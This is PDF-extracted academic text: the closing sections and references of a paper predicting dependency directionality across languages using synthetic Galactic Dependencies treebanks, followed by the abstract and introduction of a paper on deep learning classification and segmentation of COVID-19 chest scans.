system in the starred row is the one that we selected for row 2 of Table 3. 7.3 Contribution of different feature classes To understand the contribution of different hand- engineered features, we performed forward selec- tion tests on the depth-1 system, including only some of the features. In all cases, we trained in the “+GD” condition. The results are shown in Ta- ble 4. Any class of features is substantially better than baseline, but we observe that most of the total benefit can be obtained with just PMI or asymme- try features. Those features indicate, for example, whether a verb tends to attract nouns to its right or left. We did not see a gain from length thresholding. 7.4 Robustness to noisy input We also tested our directionality prediction system on noisy input (without retraining it on noisy input). Specifically, we tested the depth-1 sH system. This time, when evaluating on the dev split of a held-out language, we provided a noisy version of that input corpus that had been retagged by an automatic POS tagger (Nguyen et al., 2014), which was trained on just 100 gold-tagged sentences from the train split of that language. The average tagging accuracy over the 20 languages was only 77.26%. Nonetheless, the “UD”-trained and “+GD”-trained systems got re- spective losses of 0.052 and 0.041—nearly as good as in Table 3, which used gold POS tags. MS13 N10 EC ∅ UD +GD loss 0.166 0.139 0.098 0.083 0.080 0.039 Table 5: Cross-validation average expected loss of the two grammar induction methods, MS13 (Mareček and Straka, 2013) and N10 (Naseem et al., 2010), compared to the EC heuristic of §5 and our architecture of §6 (the version from the last line of Table 3). In these experiments, the dependency relation types are ordered POS pairs. N10 harnesses prior linguistic knowl- edge, but its improvement upon MS13 is not statistically signif- icant. Both grammar induction systems are significantly worse than the rest of the systems, including even our two baseline systems, namely EC (the “expected count” heuristic from §5) and ∅ (the no-feature baseline system from Table 4 line 0). Like N10, these baselines make use of some cross-linguistic knowl- edge, which they extract in different ways from the training tree- banks. Among our own 4 systems, EC is significantly worse than all others, and +GD is significantly better than all others. (Note: When training the baselines, we found that including the +GD languages—a bias-variance tradeoff— harmed EC but helped ∅. The table reports the better result in each case.) 7.5 Hyperparameter settings For each result in Tables 3–4, the hyperparameters were chosen by grid search on the cross-validation objective (and the table reports the best result). For the remaining experiments, we select the depth-1 combined models (11) for both “UD” and “+GD,” as they are the best models according to Table 3. The hyperparameters for the selected models are as follows: When training with “UD,” we took α = 1 (which ignores sN), with hidden layer size h = 256, ψ = sigmoid, L2 coeff = 0 (no L2 regularization), and dropout = 0.2. When training with “+GD,” we took α = 0.7, with different hy- perparameters for the two interpolated models: sH uses h = 128, ψ = sigmoid, L2 coeff = 0, and dropout = 0.4, while sN uses h = 128, emb size = 128, rnn size = 32, ψ = relu, L2 coeff = 0, and dropout = 0.2. For both “UD” and “+GD”, we use λ = 1 for the smoothing in footnote 6. 7.6 Comparison with grammar induction Grammar induction is an alternative way to predict word order typology. Given a corpus of a language, we can first use grammar induction to parse it into dependency trees, and then estimate the directional- ity of each dependency relation type based on these (approximate) trees. However, what are the dependency relation types? Current grammar induction systems produce unla- beled dependency edges. Rather than try to obtain 154 0.00 0.02 0.04 0.06 0.08 0.10 0.12 0.14 0.16 Average Proportion 0.00 0.05 0.10 0.15 0.20 0.25 0.30 0.35 0.40 0.45 ε -I n s e n s it iv e L o s s cc det emph ccomp prt remnant nsubjpasscsubj conj foreign vocative neg discourse mark case auxpass mwe advcl aux amod reflex parataxis advmod nsubj nummod reparandum punct relcl tmod compound csubjpass poss goeswith xcomp cop name dep appos list nmod dobj iobj expl predetpreconj acl Figure 3: Cross-validation loss broken down by relation. We plot each relation r with x coordinate = the proportion of r in the average training corpus = meanL∈Train p∗train(r | L) ∈ [0,1], and with y coordinate = the weighted average∑ L∈Heldout wL(r) lossε(p̂dev(→|r,L),p ∗ dev(→|r,L)) (see (13)). a UD label like r = amod for each edge, we la- bel the edge deterministically with a POS pair such as r = (parent = NOUN,child = ADJ). Thus, we will attempt to predict the directionality of each POS-pair relation type. For comparison, we retrain our supervised system to do the same thing. For the grammar induction system, we try the implementation of DMV with stop-probability es- timation by Mareček and Straka (2013), which is a common baseline for grammar induction (Le and Zuidema, 2015) because it is language-independent, reasonably accurate, fast, and convenient to use. We also try the grammar induction system of Naseem et al. (2010), which is the state-of-the-art system on UD (Noji et al., 2016). Naseem et al. (2010)’s method, like ours, has prior knowledge of what typ- ical human languages look like. Table 5 shows the results. Compared to Mareček and Straka (2013), Naseem et al. (2010) gets only a small (insignificant) improvement—whereas our “UD” system halves the loss, and the “+GD” sys- tem halves it again. Even our baseline systems are significantly more accurate than the grammar induc- tion systems, showing the effectiveness of casting the problem as supervised prediction. 7.7 Fine-grained analysis Beyond reporting the aggregate cross-validation loss over the 20 training languages, we break down the cross-validation predictions by relation type. Fig- ure 3 shows that the frequent relations are all quite 0.0 0.1 0.2 0.3 0.4 0.5 ε-Insensitive Loss (baseline) 0.0 0.1 0.2 0.3 0.4 0.5 ε -I n se n si ti v e L o ss ( fu ll m o d e l) cc det emph ccomp prt remnant nsubjpasscsubj conj foreign vocative neg discourse mark case auxpass mwe advcl aux amod reflex parataxis advmod nsubj nummod reparandum punct relcl tmod compound csubjpass poss goeswith xcomp cop name dep appos list nmod dobj iobj expl predetpreconj acl Figure 4: The y coordinate is the average loss of our model (Table 4 line 8), just as in Figure 3, whereas the x coordinate is the average loss of a simple baseline model ∅ that ignores the input corpus (Table 4 line 0). Relations whose directionality varies more by language have higher baseline loss. Relations that beat the baseline fall below the diagonal line. The marker size for each relation is proportional to the x-axis in Figure 3. predictable. Figure 4 shows that our success is not just because the task is easy—on relations whose di- rectionality varies by language, so that a baseline method does poorly, our system usually does well. To show that our system is behaving well across languages and not just on average, we zoom in on 5 relation types that are particularly common or of particular interest to linguistic typologists. These 5 relations together account for 46% of all relation to- kens in the average language: nmod = noun-nominal modifier order, nsubj = subject-verb order (feature 82A in the World Atlas of Language Structures), dobj = object-verb order (83A), amod = adjective- noun order (87A), and case = placement of both adpositions and case markers (85A). As shown in Figure 5, most points in the first five plots fall in or quite near the desired region. We are pleased to see that the predictions are robust when the training data is unbalanced. For example, the case relation points leftward in most real lan- guages, yet our system can still predict the right di- rectionality of “hi”, “et” and “fi.” The credit goes to the diversity of our training set, which contains various synthetic case-right languages: the system fails on these three languages if we train on real lan- guages only. That said, apparently our training set is still not diverse enough to do well on the outlier “ar” (Arabic); see Figure 4 in Wang and Eisner (2016). 155 0.0 0.2 0.4 0.6 0.8 1.0 True 0.0 0.2 0.4 0.6 0.8 1.0 P re d ic ti o n no grc_proiel ar da pt et cs grc it got de la_proiel frbg fi la_itt es nl hi en nmod 0.0 0.2 0.4 0.6 0.8 1.0 True 0.0 0.2 0.4 0.6 0.8 1.0 P re d ic ti o n no grc_proiel arda pt et cs grc it got de la_proiel fr bg fi la_itt es nlhi en nsubj 0.0 0.2 0.4 0.6 0.8 1.0 True 0.0 0.2 0.4 0.6 0.8 1.0 P re d ic ti o n no grc_proiel ar da pt et cs grc it got de la_proiel fr bg fi la_itt es nl hi en dobj 0.0 0.2 0.4 0.6 0.8 1.0 True 0.0 0.2 0.4 0.6 0.8 1.0 P re d ic ti o n no grc_proiel ar da pt et cs grc it got de la_proiel fr bgfi la_itt es nl hi en amod 0.0 0.2 0.4 0.6 0.8 1.0 True 0.0 0.2 0.4 0.6 0.8 1.0 P re d ic ti o n no grc_proielar da pt et cs grc itgot de la_proielfr bg fi la_itt es nl hi en case 0.0 0.2 0.4 0.6 0.8 1.0 True 0.0 0.2 0.4 0.6 0.8 1.0 P re d ic ti o n nogrc_proielar dapt etcs grcitgotdela_proielfr bg fila_itt esnl hien case (Trained with UD) Figure 5: Scatterplots of predicted vs. true directionalities (by cross-validation). In the plot for relation type r, each language appears as a marker at (p∗, p̂) (see §4), with the marker size pro- portional to wL(r) (see (13)). Points that fall between the solid lines (|p̂−p∗| ≤ ε) are considered “correct,” by the definition of ε-insensitive loss. The last plot (bottom right) shows worse predictions for case when the model is trained on UD only. 7.8 Binary classification accuracy Besides ε-insensitive loss, we also measured how the systems perform on the coarser task of binary classification of relation direction. We say that re- lation r is dominantly “rightward” in language L iff p∗(→| r,L) > 0.5. We say that a system predicts “rightward” according to whether p̂(→| r,L) > 0.5. We evaluate whether this binary prediction is cor- rect for each of the 20 most frequent relations r, for each held-out language L, using 5-fold cross- validation over the 20 training languages L as in the previous experiment. Tables 6 and 7 respectively summarize these results by relation (equal average Relation Rate EC ∅ UD +GD nmod 0.15 0.85 0.9 0.9 0.9 punct 0.11 0.85 0.85 0.85 0.85 case 0.11 0.75 0.85 0.85 1 nsubj 0.08 0.95 0.95 0.95 0.95 det 0.07 0.8 0.9 0.9 0.9 dobj 0.06 0.6 0.75 0.75 0.85 amod 0.05 0.6 0.6 0.75 0.9 advmod 0.05 0.9 0.85 0.85 0.85 cc 0.04 0.95 0.95 0.95 0.95 conj 0.04 1 1 1 1 mark 0.03 0.95 0.95 0.95 0.95 advcl 0.02 0.85 0.85 0.85 0.8 cop 0.02 0.75 0.75 0.65 0.75 aux 0.02 0.9 0.6 0.75 0.65 iobj 0.02 0.45 0.55 0.5 0.6 acl 0.01 0.45 0.85 0.85 0.8 nummod 0.01 0.9 0.9 0.9 0.9 xcomp 0.01 0.95 0.95 0.95 1 neg 0.01 1 1 1 1 ccomp 0.01 0.75 0.95 0.95 0.95 Avg. - 0.81 0.8475 0.855 0.8775 Table 6: Accuracy on the simpler task of binary classification of relation directionality. The most common relations are shown first: the “Rate” column gives the average rate of the relation across the 20 training languages (like the x coordinate in Fig. 3). over languages) and by language (equal average over relations). Keep in mind that these systems had not been specifically trained to place relations on the correct side of the artificial 0.5 boundary. Binary classification is an easier task. It is easy because, as the ∅ column in Table 6 indicates, most relations have a clear directionality preference shared by most of the UD languages. As a result, the better models with more features have less opportu- nity to help. Nonetheless, they do perform better, and the EC heuristic continues to perform worse. In particular, EC fails significantly on dobj and iobj. This is because nsubj, dobj, and iobj often have different directionalities (e.g., in SVO languages), but the EC heuristic will tend to pre- dict the same direction for all of them, according to whether NOUNs tend to precede nearby VERBs. 7.9 Final evaluation on test data All previous experiments were conducted by cross- validation on the 20 training languages. We now train the system on all 20, and report results on the 17 blind test languages (Table 8). In our evaluation metric (1), R includes all 57 relation types that ap- pear in training data, plus a special UNK type for 156 target EC ∅ UD +GD ar 0.8 0.8 0.75 0.85 bg 0.85 0.95 0.95 0.95 cs 0.9 1 1 0.95 da 0.8 0.95 0.95 0.95 de 0.9 0.9 0.9 0.95 en 0.9 1 1 1 es 0.9 0.9 0.95 0.95 et 0.8 0.8 0.8 0.8 fi 0.75 0.85 0.85 0.85 fr 0.9 0.9 0.9 0.95 got 0.75 0.8 0.85 0.8 grc 0.6 0.7 0.7 0.75 grc proiel 0.8 0.8 0.85 0.9 hi 0.6 0.45 0.45 0.7 it 0.9 0.9 0.9 0.95 la itt 0.7 0.85 0.8 0.85 la proiel 0.7 0.7 0.75 0.7 nl 0.95 0.85 0.85 0.85 no 0.9 1 1 0.95 pt 0.8 0.85 0.9 0.9 Avg. 0.81 0.8475 0.855 0.8775 Table 7: Accuracy on the simpler task of binary classification of relation directionality for each training language. A detailed comparison shows that EC is significantly worse than UD and +GD, and that ∅ is significantly worse than +GD (paired permu- tation test over the 20 languages, p < 0.05). The improvement from UD to +GD is insignificant, which suggests that this is an easier task where weak models might suffice. relations that appear only in test data. The results range from good to excellent, with synthetic data providing consistent and often large improvements. These results could potentially be boosted in the future by using an even larger and more diverse training set. In principle, when evaluating on any one of our 37 real languages, one could train a sys- tem on all of the other 36 (plus the galactic lan- guages derived from them), not just 20. Moreover, the Universal Dependencies collection has contin- ued to grow beyond the 37 languages used here (§3). Finally, our current setup extracts only one training example from each (real or synthetic) language. One could easily generate a variant of this example each time the language is visited during stochastic opti- mization, by bootstrap-resampling its training cor- pus (to add “natural” variation) or subsampling it (to train the predictor to work on smaller corpora). In the case of a synthetic language, one could also gen- erate a corpus of new trees each time the language is visited (by re-running the stochastic permutation procedure, instead of reusing the particular permuta- tion released by the Galactic Dependencies project). Test Train target UD +GD target UD +GD cu 0.024 0.024 ar 0.116 0.057 el 0.056 0.011 bg 0.037 0.015 eu 0.250 0.072 cs 0.025 0.014 fa 0.220 0.134 da 0.024 0.017 fi ftb 0.073 0.029 de 0.046 0.025 ga 0.181 0.154 en 0.025 0.036 he 0.079 0.033 es 0.012 0.007 hr 0.062 0.011 et 0.055 0.014 hu 0.119 0.102 fi 0.069 0.070 id 0.099 0.076 fr 0.024 0.018 ja ktc 0.247 0.078 got 0.008 0.026 la 0.036 0.004 grc 0.026 0.007 pl 0.056 0.023 grc proiel 0.004 0.017 ro 0.029 0.009 hi 0.363 0.191 sl 0.015 0.031 it 0.011 0.008 sv 0.012 0.008 la itt 0.033 0.023 ta 0.238 0.053 la proiel 0.018 0.021 nl 0.069 0.066 no 0.008 0.010 pt 0.038 0.004 Test Avg. 0.106 0.050* All Avg. 0.076 0.040* Table 8: Our final comparison on the 17 test languages appears at left. We ask whether the average expected loss on these 17 real target languages is reduced by augmenting the training pool of 20 UD languages with +20*21*21 GD languages. For com- pleteness, we extend the table with the cross-validation results on the training pool. The “Avg.” lines report the average of 17 test or 37 training+testing languages. We mark both “+GD” av- erages with “*” as they are significantly better than their “UD” counterparts (paired permutation test by language, p < 0.05). 8 Related Work Typological properties can usefully boost the per- formance of cross-linguistic systems (Bender, 2009; O’Horan et al., 2016). These systems mainly aim to annotate low-resource languages with help from models trained on similar high-resource languages. Naseem et al. (2012) introduce a “selective shar- ing” technique for generative parsing, in which a Subject-Verb language will use parameters shared with other Subject-Verb languages. Täckström et al. (2013) and Zhang and Barzilay (2015) extend this idea to discriminative parsing and gain further im- provements by conjoining regular parsing features with typological features. The cross-linguistic neu- ral parser of Ammar et al. (2016) conditions on ty- pological features by supplying a “language embed- ding” as input. Zhang et al. (2012) use typological properties to convert language-specific POS tags to UD POS tags, based on their ordering in a corpus. Moving from engineering to science, lin- 157 guists seek typological universals of human lan- guage (Greenberg, 1963; Croft, 2002; Song, 2014; Hawkins, 2014), e.g., “languages with domi- nant Verb-Subject-Object order are always preposi- tional.” Dryer and Haspelmath (2013) characterize 2679 world languages with 192 typological proper- ties. Their WALS database can supply features to NLP systems (see previous paragraph) or gold stan- dard labels for typological classifiers. Daumé III and Campbell (2007) take WALS as input and propose a Bayesian approach to discover new universals. Georgi et al. (2010) impute missing properties of a language, not by using universals, but by backing off to the language’s typological cluster. Murawaki (2015) use WALS to help recover the evolutionary tree of human languages; Daumé III (2009) consid- ers the geographic distribution of WALS properties. Attempts at automatic typological classification are relatively recent. Lewis and Xia (2008) pre- dict typological properties from induced trees, but guess those trees from aligned bitexts, not by mono- lingual grammar induction as in §7.6. Liu (2010) and Futrell et al. (2015) show that the directional- ity of (gold) dependencies is indicative of “basic” word order and freeness of word order. Those papers predict typological properties from trees that are au- tomatically (noisily) annotated or manually (expen- sively) annotated. An alternative is to predict the ty- pology directly from raw or POS-tagged text, as we do. Saha Roy et al. (2014) first explored this idea, building a system that correctly predicts adposition typology on 19/23 languages with only word co- occurrence statistics. Zhang et al. (2016) evaluate semi-supervised POS tagging by asking whether the induced tag sequences can predict typological prop- erties. Their prediction approach is supervised like ours, although developed separately and trained on different data. They more simply predict 6 binary- valued WALS properties, using 6 independent bi- nary classifiers based on POS bigram and trigrams. Our task is rather close to grammar induction, which likewise predicts a set of real numbers giv- ing the relative probabilities of competing syntactic configurations. Most previous work on grammar in- duction begins with maximum likelihood estimation of some generative model—such as a PCFG (Lari and Young, 1990; Carroll and Charniak, 1992) or dependency grammar (Klein and Manning, 2004)— though it may add linguistically-informed inductive bias (Ganchev et al., 2010; Naseem et al., 2010). Most such methods use local search and must wres- tle with local optima (Spitkovsky et al., 2013). Fine- grained typological classification might supplement this approach, by cutting through the initial com- binatorial challenge of establishing the basic word- order properties of the language. In this paper we only quantify the directionality of each relation type, ignoring how tokens of these relations interact lo- cally to give coherent parse trees. Grammar induc- tion methods like EM could naturally consider those local interactions for a more refined analysis, when guided by our predicted global directionalities. 9 Conclusions and Future Work We introduced a typological classification task, which attempts to extract quantitative knowledge about a language’s syntactic structure from its sur- face forms (POS tag sequences). We applied super- vised learning to this apparently unsupervised prob- lem. As far as we know, we are the first to utilize synthetic languages to train a learner for real lan- guages: this move yielded substantial benefits.12 Figure 5 shows that we rank held-out languages rather accurately along a spectrum of directionality, for several common dependency relations. Table 8 shows that if we jointly predict the directionalities of all the relations in a new language, most of those numbers will be quite close to the truth (low aggre- gate error, weighted by relation frequency). This holds promise for aiding grammar induction. Our trained model is robust when applied to noisy POS tag sequences. In the future, however, we would like to make similar predictions from raw word sequences. That will require features that ab- stract away from the language-specific vocabulary. Although recurrent neural networks in the present paper did not show a clear advantage over hand- engineered features, they might be useful when used with word embeddings. Finally, we are interested in downstream uses. Several NLP tasks have benefited from typologi- cal features (§8). By using end-to-end training, our methods could be tuned to extract features (existing or novel) that are particularly useful for some task. 12Although Wang and Eisner (2016) review uses of synthetic training data elsewhere in machine learning. 158 Acknowledgements This work was funded by the U.S. National Science Foundation under Grant No. 1423276. We are grateful to the state of Maryland for providing indispensable computing resources via the Maryland Advanced Research Computing Cen- ter (MARCC). We thank the Argo lab members for useful discussions. Finally, we thank TACL action editor Mark Steedman and the anonymous review- ers for high-quality suggestions, including the EC baseline and the binary classification evaluation. References Waleed Ammar, George Mulcaire, Miguel Balles- teros, Chris Dyer, and Noah Smith. Many lan- guages, one parser. Transactions of the Associ- ation of Computational Linguistics, 4:431–444, 2016. Emily M. Bender. Linguistically naı̈ve != language independent: Why NLP needs linguistic typol- ogy. In Proceedings of the EACL 2009 Workshop on the Interaction between Linguistics and Com- putational Linguistics: Virtuous, Vicious or Vacu- ous?, pages 26–32, 2009. Glenn Carroll and Eugene Charniak. Two experi- ments on learning probabilistic dependency gram- mars from corpora. In Working Notes of the AAAI Workshop on Statistically-Based NLP Techniques, pages 1–13, 1992. Kyunghyun Cho, Bart van Merrienboer, Dzmitry Bahdanau, and Yoshua Bengio. On the properties of neural machine translation: Encoder-decoder approaches. In Proceedings of Eighth Workshop on Syntax, Semantics and Structure in Statistical Translation, pages 103–111, 2014. Noam Chomsky. Lectures on Government and Bind- ing: The Pisa Lectures. Holland: Foris Publica- tions, 1981. Noam Chomsky and Howard Lasnik. The theory of principles and parameters. In Syntax: An Inter- national Handbook of Contemporary Research, Joachim Jacobs, Arnim von Stechow, Wolfgang Sternefeld, and Theo Vennemann, editors. Berlin: de Gruyter, 1993. William Croft. Typology and Universals. Cambridge University Press, 2002. Hal Daumé III. Non-parametric Bayesian areal lin- guistics. In Proceedings of Human Language Technologies: The 2009 Annual Conference of the North American Chapter of the Association for Computational Linguistics, pages 593–601, 2009. Hal Daumé III and Lyle Campbell. A Bayesian model for discovering typological implications. In Proceedings of the 45th Annual Meeting of the Association of Computational Linguistics, pages 65–72, 2007. Matthew S. Dryer and Martin Haspelmath, editors. The World Atlas of Language Structures Online. Max Planck Institute for Evolutionary Anthropol- ogy, Leipzig, 2013. http://wals.info/. Joakim Nivre, et al. Universal Dependencies 1.2. LINDAT/CLARIN digital library at the Institute of Formal and Applied Linguistics, Charles Uni- versity in Prague. Data available at http:// universaldependencies.org, 2015. Robert Frank and Shyam Kapur. On the use of trig- gers in parameter setting. Linguistic Inquiry, 27: 623–660, 1996. Richard Futrell, Kyle Mahowald, and Edward Gib- son. Quantifying word order freedom in depen- dency corpora. In Proceedings of the Third Inter- national Conference on Dependency Linguistics, pages 91–100, 2015. Kuzman Ganchev, Joao Graça, Jennifer Gillenwater, and Ben Taskar. Posterior regularization for struc- tured latent variable models. Journal of Machine Learning Research, 11:2001–2049, 2010. Ryan Georgi, Fei Xia, and William Lewis. Com- paring language similarity across genetic and typologically-based groupings. In Proceedings of the 23rd International Conference on Computa- tional Linguistics, pages 385–393, 2010. Edward Gibson and Kenneth Wexler. Triggers. Lin- guistic Inquiry, 25(3):407–454, 1994. Xavier Glorot and Yoshua Bengio. Understanding the difficulty of training deep feedforward neu- ral networks. In Proceedings of the International Conference on Artificial Intelligence and Statis- tics, 2010. Joseph H. Greenberg. Some universals of grammar with particular reference to the order of mean- 159 ingful elements. In Universals of Language, Joseph H. Greenberg, editor, pages 73–113. MIT Press, 1963. John A. Hawkins. Word Order Universals. Elsevier, 2014. Sepp Hochreiter and Jürgen Schmidhuber. Long short-term memory. Neural Computation, 9(8): 1735–1780, 1997. Dan Klein and Christopher Manning. Corpus-based induction of syntactic structure: Models of depen- dency and constituency. In Proceedings of the 42nd Annual Meeting of the Association for Com- putational Linguistics, pages 478–485, 2004. Karim Lari and Steve J. Young. The estimation of stochastic context-free grammars using the Inside-Outside algorithm. Computer Speech and Language, 4(1):35–56, 1990. Phong Le and Willem Zuidema. Unsupervised de- pendency parsing: Let’s use supervised parsers. In Proceedings of the 2015 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 651–661, 2015. William D. Lewis and Fei Xia. Automatically iden- tifying computationally relevant typological fea- tures. In Proceedings of the Third International Joint Conference on Natural Language Process- ing: Volume-II, 2008. Haitao Liu. Dependency direction as a means of word-order typology: A method based on de- pendency treebanks. Lingua, 120(6):1567–1578, 2010. David Mareček and Milan Straka. Stop-probability estimates computed on a large corpus improve un- supervised dependency parsing. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Pa- pers), pages 281–290, 2013. Yugo Murawaki. Continuous space representations of linguistic typology and their application to phy- logenetic inference. In Proceedings of the 2015 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 324–334, 2015. Tahira Naseem, Harr Chen, Regina Barzilay, and Mark Johnson. Using universal linguistic knowl- edge to guide grammar induction. In Proceedings of the 2010 Conference on Empirical Methods in Natural Language Processing, pages 1234–1244, 2010. Tahira Naseem, Regina Barzilay, and Amir Glober- son. Selective sharing for multilingual depen- dency parsing. In Proceedings of the 50th An- nual Meeting of the Association for Computa- tional Linguistics (Volume 1: Long Papers), pages 629–637, 2012. Dat Quoc Nguyen, Dai Quoc Nguyen, Dang Duc Pham, and Son Bao Pham. RDRPOSTagger: A ripple down rules-based part-of-speech tagger. In Proceedings of the Demonstrations at the 14th Conference of the European Chapter of the Asso- ciation for Computational Linguistics, pages 17– 20, 2014. Hiroshi Noji, Yusuke Miyao, and Mark Johnson. Using left-corner parsing to encode universal structural constraints in grammar induction. In Proceedings of the 2016 Conference on Empirical Methods in Natural Language Processing, pages 33–43, 2016. Helen O’Horan, Yevgeni Berzak, Ivan Vulic, Roi Reichart, and Anna Korhonen. Survey on the use of typological information in natural language processing. In Proceedings of the 26th Interna- tional Conference on Computational Linguistics: Technical Papers, pages 1297–1308, 2016. Rishiraj Saha Roy, Rahul Katare, Niloy Ganguly, and Monojit Choudhury. Automatic discovery of adposition typology. In Proceedings of the 25th International Conference on Computational Linguistics: Technical Papers, pages 1037–1046, 2014. Jae Jung Song. Linguistic Typology: Morphology and Syntax. Routledge, 2014. Valentin I. Spitkovsky, Hiyan Alshawi, and Daniel Jurafsky. From baby steps to leapfrog: How “less is more” in unsupervised dependency parsing. In Human Language Technologies: The 2010 An- nual Conference of the North American Chapter of the Association for Computational Linguistics, pages 751–759, 2010. 160 Valentin I. Spitkovsky, Hiyan Alshawi, and Daniel Jurafsky. Breaking out of local optima with count transforms and model recombination: A study in grammar induction. In Proceedings of the 2013 Conference on Empirical Methods in Natural Language Processing, pages 1983–1995, 2013. Oscar Täckström, Ryan McDonald, and Joakim Nivre. Target language adaptation of discrimina- tive transfer parsers. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Computational Linguistics: Hu- man Language Technologies, pages 1061–1071, 2013. Tijmen Tieleman and Geoffrey Hinton. Lecture 6.5—RmsProp: Divide the gradient by a running average of its recent magnitude. COURSERA: Neural Networks for Machine Learning, 2012. Dingquan Wang and Jason Eisner. The Galac- tic Dependencies treebanks: Getting more data by synthesizing new languages. Transactions of the Association of Computational Linguistics, 4: 491–505, 2016. Data available at https:// github.com/gdtreebank/gdtreebank. Yuan Zhang and Regina Barzilay. Hierarchical low- rank tensors for multilingual transfer parsing. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, pages 1857–1867, 2015. Yuan Zhang, Roi Reichart, Regina Barzilay, and Amir Globerson. Learning to map into a uni- versal POS tagset. In Proceedings of the 2012 Joint Conference on Empirical Methods in Nat- ural Language Processing and Computational Natural Language Learning, pages 1368–1378, 2012. Yuan Zhang, David Gaddy, Regina Barzilay, and Tommi Jaakkola. Ten pairs to tag—multilingual POS tagging via coarse mapping between embed- dings. In Proceedings of the 2016 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 1307–1317, 2016. 161 162 work_aayskfc7ajcojb5l63iejmmpvy ---- A multi-task pipeline with specialized streams for classification and segmentation of infection manifestations in COVID-19 scans A multi-task pipeline with specialized streams for classification and segmentation of infection manifestations in COVID-19 scans Shimaa El-bana1, Ahmad Al-Kabbany2,3,4 and Maha Sharkas4 1 Alexandria Higher Institute of Engineering and Technology, Alexandria, Egypt 2 Intelligent Systems Lab, Arab Academy for Science, Technology, and Maritime Transport, Alexandria, Egypt 3 Department of Research and Development, VRapeutic, Cairo, Egypt 4 Department of Electronics and Communications Engineering, Arab Academy for Science, Technology, and Maritime Transport, Alexandria, Egypt ABSTRACT We are concerned with the challenge of coronavirus disease (COVID-19) detection in chest X-ray and Computed Tomography (CT) scans, and the classification and segmentation of related infection manifestations. Even though it is arguably not an established diagnostic tool, using machine learning-based analysis of COVID-19 medical scans has shown the potential to provide a preliminary digital second opinion. This can help in managing the current pandemic, and thus has been attracting significant research attention. In this research, we propose a multi-task pipeline that takes advantage of the growing advances in deep neural network models. In the first stage, we fine-tuned an Inception-v3 deep model for COVID-19 recognition using multi-modal learning, that is, using X-ray and CT scans. In addition to outperforming other deep models on the same task in the recent literature, with an attained accuracy of 99.4%, we also present comparative analysis for multi-modal learning against learning from X-ray scans alone. The second and the third stages of the proposed pipeline complement one another in dealing with different types of infection manifestations. The former features a convolutional neural network architecture for recognizing three types of manifestations, while the latter transfers learning from another knowledge domain, namely, pulmonary nodule segmentation in CT scans, to produce binary masks for segmenting the regions corresponding to these manifestations. Our proposed pipeline also features specialized streams in which multiple deep models are trained separately to segment specific types of infection manifestations, and we show the significant impact that this framework has on various performance metrics. We evaluate the proposed models on widely adopted datasets, and we demonstrate an increase of approximately 2.5% and 4.5% for dice coefficient and mean intersection-over-union (mIoU), respectively, while achieving 60% reduction in computational time, compared to the recent literature. Subjects Bioinformatics, Computer Vision, Data Mining and Machine Learning Keywords COVID-19, Deeplab, Medical imaging, Pneumonia, Transfer learning, Multimodal learning How to cite this article El-bana S, Al-Kabbany A, Sharkas M. 2020. A multi-task pipeline with specialized streams for classification and segmentation of infection manifestations in COVID-19 scans. PeerJ Comput. Sci. 6:e303 DOI 10.7717/peerj-cs.303 Submitted 30 June 2020 Accepted 26 September 2020 Published 19 October 2020 Corresponding author Ahmad Al-Kabbany, alkabbany@aast.edu, alkabbany@ieee.org Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.303 Copyright 2020 El-bana et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.303 mailto:alkabbany@�aast.�edu mailto:alkabbany@�ieee.�org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.303 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ INTRODUCTION The Severe Acute Respiratory Syndrome CoronaVirus 2 (SARS-CoV-2) of the Coronaviridae Study Group of the International Committee on Taxonomy of Viruses (2020) is a strain of Severe Acute Respiratory Syndrome-related CoronaVirus (SARS-CoV or SARSr-CoV). The latter is a species of coronaviruses, which are a group Ribonucleic Acid (RNA) viruses. SARS-CoV-2 causes an infectious respiratory disease that is known as the Coronavirus Disease 2019 (COVID-19), since it was first identified in December 2019, following a pneumonia outbreak Lai et al. (2020), Sharfstein, Becker & Mello (2020). The first human-to-human transmission was confirmed in January 2020 Chan et al. (2020), and the World Health Organization (WHO) declared a pandemic on the 11th of March 2020. Over three million confirmed cases to date, hundreds of thousands of deaths, and a severe socioeconomic impact in hundreds of countries that are hit by the virus (Li et al., 2020b; Wu, Leung & Leung, 2020) have induced significant efforts from governmental, public, and private sectors worldwide to manage the pandemic. One principal aspect of pandemic management and future epidemic prevention is the development of effective, efficient, and scale-able diagnostic tools. There are several diagnostic tools that have been used, or currently under development, for SARS-CoV-2. To the best of our knowledge, nucleic acid tests are the most established and the most widely used tool to date (Tahamtan & Ardebili, 2020); in particular, the Polymerase Chain Reaction (PCR) and its variants, such as Quantitative PCR (qPCR) and Reverse Transcription PCR (RT-PCR). PCR is a DNA and RNA cloning technique that is used to amplify/augment DNA/RNA samples required in micro biology studies. Even though it is characterized by high sensitivity and specificity, in addition to rapid detection, it is prone to producing false negatives. In part, this is due to the localized nature of the sample acquisition process, mainly as nasal, throat, and nasopharyngeal swabs, that is, an active virus could be present elsewhere along the respiratory tract. There are also other limitations for PCR-based tests including universal availability, especially amidst shortage of supplies, slow turnaround times, depending on the resources of the lab, and in many cases, it is required to repeat the tests several times before they can be confirmed (Chu et al., 2020). Other diagnostic tools include antibody tests which can give an indication on whether a person was previously infected by the virus. However, they are still not well established; hence, they are not widely used. It is worth mentioning that the recent literature features recommendations for combining more than one diagnostic tool. Tahamtan & Ardebili (2020), for example, suggested the adoption of a combination of qRT-PCR and CT scans for robust management of COVID-19. Using CT scans and other modalities, such as X-ray, falls under an ever-growing area of high-paced research, namely, medical imaging diagnostics. It has been emerging as a reliable disease diagnosis tool, with several recent research findings referring to a performance that is on-par with human performance (Liu et al., 2019; Shen et al., 2019). In a large part, this is due to the advances that are taking place in developing new machine learning techniques. This has resulted in the emergence of the Human-in-the-loop El-bana et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.303 2/27 http://dx.doi.org/10.7717/peerj-cs.303 https://peerj.com/computer-science/ (HITL) AI framework 